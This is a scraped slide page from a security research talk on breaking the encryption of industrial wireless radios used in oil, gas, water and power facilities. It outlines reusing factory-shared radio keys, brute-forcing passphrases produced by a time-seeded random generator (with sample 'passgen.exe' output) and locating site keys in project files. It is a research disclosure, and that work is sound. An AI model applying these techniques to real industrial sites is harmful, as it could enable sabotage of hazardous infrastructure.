facilities from 40 miles away
play

FACILITIES FROM 40 MILES AWAY Lucas Apa Carlos Mario Penagos About - PowerPoint PPT Presentation

Aug 26, 2023 •315 likes •850 views

COMPROMISING INDUSTRIAL FACILITIES FROM 40 MILES AWAY Lucas Apa Carlos Mario Penagos About Us Lucas Apa Carlos Penagos Vulnerability Research Exploitation Cryptography Reverse Engineering ICS/SCADA Argentina Colombia 2 Agenda

  1. COMPROMISING INDUSTRIAL FACILITIES FROM 40 MILES AWAY Lucas Apa Carlos Mario Penagos

  2. About Us Lucas Apa Carlos Penagos Vulnerability Research Exploitation Cryptography Reverse Engineering ICS/SCADA Argentina Colombia 2

  3. Agenda  Motivation  Industries and Applications  Wireless Standards  Journey of Radio Encryption Keys  Vendor1 Wireless Devices  Vendor2 Wireless Devices  Vendor3 Wireless Devices 3

  4. Motivation  Critical Infrastructures becoming targets  Insider attacks (Lately)  Devices connected to Internet  0days to reach the PLC, RTU, HMI…  Stealth and precise attacks  Incident response at hazardous sites 4

  5. Industrial Wireless Automation  Copper wires are used to monitor and control  Corrosion, Ductility, Thermal Conductivity  Cost of wires, trenching, mounting and installation  Industrial Wireless Solutions  Eliminate cost of hardwiring, logistics, installation  Heavy machinery involved  Remote control and administration (Geography)  Minimize Safety Risk & Dangerous Boxes  Adds durability 5

  6. Industries and Applications  Plunger lift/artificial lift optimization  Well-head automation  RTU/EFM I/O extensions  Cathodic protection monitoring  Hydrogen sulfide (H2S) monitoring Oil & Gas  Tank level monitoring  Pipeline cathodic protection  Rectifier voltage monitoring  Gas/liquid flow measurement  Pipeline pressure and valve Refined Petroleum monitoring Petrochemicals 6

  7. Industries and Applications (2)  Transformer temperature  Natural gas flow  Power outage reporting  Capacitor bank control  kV, Amp, MW, MVAR reading Energy - Utilities  Remote pumping stations  Water treatment plants  Water distribution systems  Wastewater/sewer collection systems  Water irrigation systems/agriculture Waste & Waste Water 7

  8. Industrial Wireless Challenges  Defeat electromagnetic interference (EMI)  Handle signal attenuation and reflections  Reliability is far more important than Speed  Higher transmitter power levels  Site surveys to assess the consistency and reliability of the plant  Mainly using 2.4Ghz or 900Mhz (ISM Band)  No “business” protocols 8

  9. Cryptographic Key Distribution (WSN)  Distribute secrets on a large number of nodes  Base stations with clusters surrounding  Limitations:  Deployment in public or hostile locations  Post-deployment knowledge  Limited bandwidth and transmission power  Methods for crypto key distribution:  Out-of-band  In-band  Factory pre-loaded 9

  10. IEEE 802.15.4 Standard  Wireless Radios (Low Power/Speed)  Set the encryption algorithm and AES Key  Upper Layer Responsibility  Each node can have an ACL  MAC for upper layers:  ZigBee  WirelessHart  ISA SP100  IETF IPv6 - LoWPAN 10

  11. ZigBee 2007 (Standard Security Mode )  Suite of high level communication protocols  Based on IEEE 802.15.4 (Low level layers)  ISM radio bands  Trust Center introduced in 2007 Trust Center  Network Key (AES 128-bit) Two Key Distribution Mechanisms:  Pre-installed (Factory Installed)  Individually Commissioned A B 1. (Commissioning tool) Pre-Installation  Managed by the Trust Center 2. Over the air 11

  12. ZigBee Pro 2007 (High Security Mode)  Many enhancements  More memory requirements  New keys introduced MasterKey_TA LinkKey TA ① Master Key Trust NetworkKey Unsecured Transport   MasterKey_TB Center Out-of-band Technique  LinkKey TB  Secure other keys  A B ② Link Key  Unicast  Unique between nodes MasterKey_TA MasterKey_TB LinkKey TA LinkKey TB ③ Network Key NetworkKey NetworkKey • Regenerated at Intervals MasterKey_AB MasterKey_AB • Needed to join the NWK LinkKey AB LinkKey AB 12

  13. The Journey of Radio Encryption Keys R i DeviceVendorID No Encryption a o Key in Firmware Key d D v c Per-Client Encryption Device Company No Encryption Key e i e Key Encryption Key E U r Device n s Change Per-Client Set No Change Company Encryption Encryption Encryption Encryption Encryption Encryption Key Key Key key Key d e Key 13

  14. Reusing Radio Keys  End-User Node Key Storage  Shared Secret  Same Firmware or Same Radio Key  Device Company Key attack 1. Buy same Device (Buy same Key) 2. Remove Radio Module 3. Connect to USB Interface 4. Interact: API & AT Command Mode 5. Send frames using the unknown key Warning: Not possible if exists a Per-Client Encryption Key 14

  15. Exploiting Vendor1 Devices  Company Profile (+1990)  Frequency Hopping Wireless Devices  Great for long or short range wireless SCADA applications  Secure proprietary FHSS with 128 bit AES encryption  Hazardous location approvals, Perfect for outdoor Ethernet SCADA or indoor PLC messaging  30+ miles point to point with high gain antennas 15

  16. Vendor1 Key Distribution “<Vendor1 Tool> is easy to use and intuitive. Default values built into the software work well for initial installation and testing making it easy for first-time users. <Vendor1 Tool> manages all important settings to ensure that the network performs correctly .” (User Guide)  RF Encryption: A 128-bit encryption level key is suggested for the user.  Blank: No encrypted packets  5-7 Chars: Field is translated into a 40-bit encryption level.  15-24 Chars : Field is translated into a 128-bit encryption level. 16

  17. Reversing Passphrase Generation Compiled C++ Binary:  srand seeds PRNG  time returns epoch  srand(time(NULL))  Low Entropy Seed  Same algorithm  rand()  Bad ANSI C function 17

  18. Attacking Weak PRNG C:\>passgen.exe 2013-04-04 21:39:08 => 1365136748 => knc6gadr40565d3j8hbrs6o0 18

  19. The Oldest Passphrase Help File C:\>passgen.exe 2013-04-04 21:39:08 => 1365136748 => knc6gadr40565d3j8hbrs6o0 2013-04-04 21:39:07 => 1365136747 => nir3f1a0dm2sdt41q91c06nt … 2008-04-17 15:20:47 => 1208470847 => re84q92vssgd671pd2smj8ig 19

  20. Comissioning Tool Audit Bruteforce Passphrase Weak PRNG Attack 25 70 Passphrases vs ~156 Million Passphrases Mixed lower case alphabet plus numbers and Every second passed, one more key common symbols Impossible to calculate all passphrases Only a few seconds to calculate all passphrases Calculate once and create a database with all Need to derive AES 128-bit key on realtime possible AES 128-bit key derivations  Easily breakable by an outsider  Further Research with the Devices  Comissioning Tools needs deep testing 20

  21. Vendor2 Wireless Devices  Market leadership: Oil & Gas  Wireless and wired solutions for the digital oil field automation  Trusted by top companies in different industries  Family System (Point to Multipoint) :  Wireless Gateways  Wireless Transmitters  I/O Expansion Modules  Hardwire Sensors 21

  22. 22

  23. An Extended Family of Devices  Applications  Oil & Gas  Refining / Petro Chemicals  Water & Waste Water  Utilities  Industrial Process Monitoring  Transmitters  RTD Temperature Transmitter  Analog/Discrete Transmitter  Flow Totalizer Transmitter  Pressure Transmitter  Hydrostatic Level Transmitter  Many more.. 23

  24. PLC RF RTU Modem SCADA DCS EFM HMI 24

  25. Tool and Project Files  How the devices access the wireless information?  “Enhanced Site Security Key” The Enhanced Site Security feature designed to provide an additional level of protection for RF packets sent and received between <Vendor2> devices and minimizes the possibility of interference from other devices in this area. This feature is not available on some older versions of legacy devices.  Security Key == Encryption Key ???  Legacy Devices Without Encryption??? 25

  26. Key Generation and Distribution  Create a “Project File” and update all Nodes  From documentation: “If the project file name is changed , a new Site Security Key will be assigned” Possible Scheme: Per-Site Encryption This Key MUST be somewhere on the Project File. 26

  27. File Name Change => New Key 27

  28. Project File Binary Diffing ProjectA \x17\x58\x4f\x51 1364154391 Sun, 24 Mar 2013 19:46:31 GMT ProjectB \x51\x58\x4f\x51 1364154449 Sun, 24 Mar 2013 19:47:29 GMT 28

  29. Component Identification  Support Center  Firmware Images & Documentation  Radio Modules, Architectures & Processors RISC 29

  30. Understanding Firmware Image (RISC)  Industry Standard Format  @Address and content  Incomplete Image (Update)  Only compiler strings CrossWorks for MSP430

  31. Component Identification 430F14 9

  32. YouTube (XT09 and 802.15.4) 32

  33. No Per-Client Key Dear <<Reseller Sales Eng>>, We are going to borrow a used “ Analog Transmitter” from one of our partners, We are going to test it for a few weeks and let you know if we decide to buy a new one . Are there any specific concern we Lucas, might take into account when deploying this device to connect it You just need to upgrade the configuration files. with our <Device>? Or just upgrade all project configuration files? Thanks. Thank you 33

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

16,000 electric buses deployed in Shenzhen Electric semi trucks are coming 92 miles 250 miles

16,000 electric buses deployed in Shenzhen Electric semi trucks are coming 92 miles 250 miles

16,000 electric buses deployed in Shenzhen Electric semi trucks are coming 92 miles 250 miles 100 miles 300 miles 500+ miles 500 miles 150 miles 220 miles 300 miles Heavy-duty vehicles in California Vehicle population Transportation

623 views • 15 slides
Unit Review .4 miles B 1.2 miles C 3,590,400 miles D Return to Table of Contents Slide 3 /

Unit Review .4 miles B 1.2 miles C 3,590,400 miles D Return to Table of Contents Slide 3 /

Slide 1 / 21 Slide 2 / 21 1 2040 yards is how many miles? A 34 miles Unit Review .4 miles B 1.2 miles C 3,590,400 miles D Return to Table of Contents Slide 3 / 21 Slide 4 / 21 2 The top shelf of your fridge is 18 inches tall. A 3

287 views • 4 slides
Facilities Facilities Facilities Division The Facilities Division provides : Engineering,

Facilities Facilities Facilities Division The Facilities Division provides : Engineering,

PRESENTATION 2019 BUDGET Facilities Facilities Facilities Division The Facilities Division provides : Engineering, maintenance, and cleaning services for the County's facilities. Services provided include: Planning, design,

887 views • 43 slides
Isomorphic Kotlin Troy Miles @therockncoder Troy Miles @therockncoder Troy Miles, aka the

Isomorphic Kotlin Troy Miles @therockncoder Troy Miles @therockncoder Troy Miles, aka the

Isomorphic Kotlin Troy Miles @therockncoder Troy Miles @therockncoder Troy Miles, aka the Rockncoder, began writing computer games in assembly language for early computers like the Apple II, Commodore C64, and the IBM PC over 38 years ago.

665 views • 53 slides
20,800 residents ~15 people/acre 15 miles of new trails 286 acres of new parks Fully

20,800 residents ~15 people/acre 15 miles of new trails 286 acres of new parks Fully

1,400 acres 8,000 dwellings 20,800 residents ~15 people/acre 15 miles of new trails 286 acres of new parks Fully multi-modal transportation network with world- class bicycle facilities. COMPLETE A community with a full spectrum of

198 views • 3 slides
Aggregate Task Force ROADWAY SYSTEM IN CHIPPEWA COUNTY State Highways 132.8 Miles County

Aggregate Task Force ROADWAY SYSTEM IN CHIPPEWA COUNTY State Highways 132.8 Miles County

Aggregate Task Force ROADWAY SYSTEM IN CHIPPEWA COUNTY State Highways 132.8 Miles County Highways 297.9 Miles Municipal Streets 70.4 Miles Township Roads (Maintained) 686.8 Miles Total Miles 1,187.9 Miles About 70 percent of the roadway

187 views • 5 slides
Update Facilities Management November 2017 Facilities Management 1. Facilities Management

Update Facilities Management November 2017 Facilities Management 1. Facilities Management

Facilities Procedures Update Facilities Management November 2017 Facilities Management 1. Facilities Management Overview 2. Partnership between Campus Facilities and Student Affairs Housing 3. Central Receiving and Shipping Update 4. Campus

464 views • 19 slides
ALEXANDER MILES INVENTED THE ELEVATOR Kalaya S Alexander Miles was born in Duluth, MN.

ALEXANDER MILES INVENTED THE ELEVATOR Kalaya S Alexander Miles was born in Duluth, MN.

ALEXANDER MILES INVENTED THE ELEVATOR Kalaya S Alexander Miles was born in Duluth, MN. He got married and his wife's name was Mrs.Candace and they had a kid named Grace. Alexander Miles was born May 18,1838. He died May 7, 1918

357 views • 9 slides
1 1 MILES SPAN MINIMUM SPANNING TREES Important: Before reading MILES SPAN , please read or

1 1 MILES SPAN MINIMUM SPANNING TREES Important: Before reading MILES SPAN , please read or

1 1 MILES SPAN MINIMUM SPANNING TREES Important: Before reading MILES SPAN , please read or at least skim the program for GB MILES . 1. Minimum spanning trees. A classic paper by R. L. Graham and Pavol Hell about the history of algorithms

623 views • 40 slides
James Miles James Miles Director, Liv-ex Ltd , History and development of the History and

James Miles James Miles Director, Liv-ex Ltd , History and development of the History and

James Miles James Miles Director, Liv-ex Ltd , History and development of the History and development of the fine wine investment market Hong Kong International Wine &amp; Spirits Fair Conference HKIWSF 2009 1 Introduction d i

351 views • 14 slides
Miles and Miles of Texas Tommy Camfield and Diane Johnston, 1976 Chords in this song: C 7 C G

Miles and Miles of Texas Tommy Camfield and Diane Johnston, 1976 Chords in this song: C 7 C G

Miles and Miles of Texas Tommy Camfield and Diane Johnston, 1976 Chords in this song: C 7 C G G 7 F A 7 D 7 C Intro: C until count in Page 1 Austin Ukulele Society Arrangement: Bob Guz, 2013 Verse 1 C F C I was born in Louisi-ana F

459 views • 12 slides
Records of Decisions and More at Federal Facilities NOVEMBER 4, 2019 FEDERAL FACILITIES

Records of Decisions and More at Federal Facilities NOVEMBER 4, 2019 FEDERAL FACILITIES

RODs and More at Federal Facilities Federal Facilities Academy Records of Decisions and More at Federal Facilities NOVEMBER 4, 2019 FEDERAL FACILITIES RESTORATION AND REUSE OFFICE 1 FEDERAL FACILITIES TRAINING The purpose of this course is

812 views • 41 slides
SPPs Operating Region Current 77,366 MW of generating capacity 46,136 MW of peak

SPPs Operating Region Current 77,366 MW of generating capacity 46,136 MW of peak

SPPs Operating Region Current 77,366 MW of generating capacity 46,136 MW of peak demand 48,930 miles transmission: 69 kV 12,569 miles 115 kV 10,239 miles 138 kV 9,691 miles 161 kV 5,049 miles

474 views • 18 slides
Jersey Bus Franchise: The Commissioner Perspective June 2017 Welcome to Jersey 5 miles 9 miles

Jersey Bus Franchise: The Commissioner Perspective June 2017 Welcome to Jersey 5 miles 9 miles

Jersey Bus Franchise: The Commissioner Perspective June 2017 Welcome to Jersey 5 miles 9 miles 100K By Philg88; Attribution: Wikimedia Foundation (www.wikimedia.org) (Own work) [CC BY 4.0 (http://creativecommons.org/licenses/by/4.0) or ODbL

320 views • 28 slides
Disaster Recovery Team Churches/Religious Facilities Educational Facilities Commercial/

Disaster Recovery Team Churches/Religious Facilities Educational Facilities Commercial/

Disaster Recovery Team Churches/Religious Facilities Educational Facilities Commercial/ Industrial/Manufacturing Hotels/ Motels/Hospitality Medical Centers/Healthcare facilities Nursing Home/ Assisted Living Retail Facilities BROWN NURSING

568 views • 27 slides
Downtown Bike Network Public Meeting May 14/15, 2018 History of Project 10 Miles of bike

Downtown Bike Network Public Meeting May 14/15, 2018 History of Project 10 Miles of bike

Downtown Bike Network Public Meeting May 14/15, 2018 History of Project 10 Miles of bike facilities to build a downtown network Design work began in 2012 Grant awarded in 2014 Work stopped in 2017 History of Project 95%

495 views • 23 slides
L A T EX for Psychological Researchers Lecture 1: Introducton Sacha Epskamp University of

L A T EX for Psychological Researchers Lecture 1: Introducton Sacha Epskamp University of

L A T EX for Psychological Researchers Lecture 1: Introducton Sacha Epskamp University of Amsterdam Department of Psychological Methods 02/11/2011 Contact Details Course website: http://sachaepskamp.com/latex-course E-mail:

879 views • 35 slides
APA Division 15 2018 APA Business Meeting San Francisco, CA Agenda Tribute to Dr. Marty Carr

APA Division 15 2018 APA Business Meeting San Francisco, CA Agenda Tribute to Dr. Marty Carr

APA Division 15 2018 APA Business Meeting San Francisco, CA Agenda Tribute to Dr. Marty Carr 1. Approval of 2017 Business Meeting Minutes 2. Presidents Report 3. Treasurers Report 4. Membership Business 5. a. Membership News b.

907 views • 54 slides
APA Production at Chicago Ben Stillwell on behalf of the Chicago APA factory team Ed Blucher,

APA Production at Chicago Ben Stillwell on behalf of the Chicago APA factory team Ed Blucher,

APA Production at Chicago Ben Stillwell on behalf of the Chicago APA factory team Ed Blucher, Dave Schmitz, Rich Northrop, Marc Berthoud, and Zack Siegel APA Workshop 10-11 June 2019 Outline Factory layout Factory planning

397 views • 23 slides
APA Style Focused on statistics For EDUC/PSY 6600 American Psychological Association (APA)

APA Style Focused on statistics For EDUC/PSY 6600 American Psychological Association (APA)

APA Style Focused on statistics For EDUC/PSY 6600 American Psychological Association (APA) Format Now using the 6th edition Used for: Theses Dissertations Paper/Journal Articles Presentations/Posters Homework for this course (most

316 views • 16 slides
Chapter 1 Automated Planning Introduction and Acting Malik Ghallab, Dana Nau and Paolo

Chapter 1 Automated Planning Introduction and Acting Malik Ghallab, Dana Nau and Paolo

Last update: February 24, 2020 Chapter 1 Automated Planning Introduction and Acting Malik Ghallab, Dana Nau and Paolo Traverso Dana S. Nau http://www.laas.fr/planning University of Maryland Nau Lecture slides for Automated Planning and

443 views • 13 slides
Machine Learning-based Trigger for DUNE Guanqun Ge, Columbia University on behalf of DUNE

Machine Learning-based Trigger for DUNE Guanqun Ge, Columbia University on behalf of DUNE

Machine Learning-based Trigger for DUNE Guanqun Ge, Columbia University on behalf of DUNE collaboration CPAD INSTRUMENTATION FRONTIER WORKSHOP University of Wisconsin-Madison, December 8, 2019 Credits: NASA 1 Outline DUNE: How it works, and

853 views • 36 slides
DESIGN, DATA SHARING &amp; DEAP Wesley K. Thompson | August 20, 2019 STUDY DESIGN ABCD STUDY

DESIGN, DATA SHARING &amp; DEAP Wesley K. Thompson | August 20, 2019 STUDY DESIGN ABCD STUDY

ABCD STUDY: STUDY DESIGN, DATA SHARING &amp; DEAP Wesley K. Thompson | August 20, 2019 STUDY DESIGN ABCD STUDY DESIGN The complete collection of baseline data was released on the NIMH Data Archive (NDA) in March 2019. Baseline data

572 views • 34 slides
2019 APA COMMISSION ON ACCREDITATION UPDATE Carlen Henington, PhD NCSP Mississippi State

2019 APA COMMISSION ON ACCREDITATION UPDATE Carlen Henington, PhD NCSP Mississippi State

2019 APA COMMISSION ON ACCREDITATION UPDATE Carlen Henington, PhD NCSP Mississippi State University OVERVIEW q Overview of APA Commission on Accreditation and the Office of Program Consultation and Accreditation q Need for Site Visitors q

410 views • 14 slides

More recommend